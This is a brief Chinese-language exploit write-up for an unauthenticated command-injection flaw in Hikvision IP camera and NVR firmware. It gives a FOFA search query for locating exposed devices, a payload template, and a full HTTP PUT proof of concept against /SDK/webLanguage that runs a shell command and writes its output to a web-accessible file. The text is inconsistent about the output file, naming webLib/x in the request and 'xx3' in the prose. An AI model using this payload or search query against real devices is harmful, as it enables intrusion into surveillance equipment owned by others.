0x01 漏洞描述
海康威视IP摄像机/NVR设备固件中发现一个未认证的远程代码执行漏洞
0x02 影响版本
漏洞影响IP摄像头和NVR设备固件,其中包括2021年6月的最新固件以及2006年发布的固件。
0x03 搜索语法
app="HIKVISION-视频监控" && status_code="200" && after="2021-07-10"
0x04 漏洞复现
漏洞点位于: /SDK/webLanguage
利用PUT方法上传xml数据:
<?xml version="1.0" encoding="UTF-8"?><language>$({{Command}}>webLib/{{lib}})</language>
漏洞的poc
PUT /SDK/webLanguage HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Content-Length: 95
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip, deflate
Connection: close
<?xml version="1.0" encoding="UTF-8"?><language>$(ls -l > webLib/x)</language>
查看文件并写入到xx3中
访问xx3则可看到当前目录下的文件
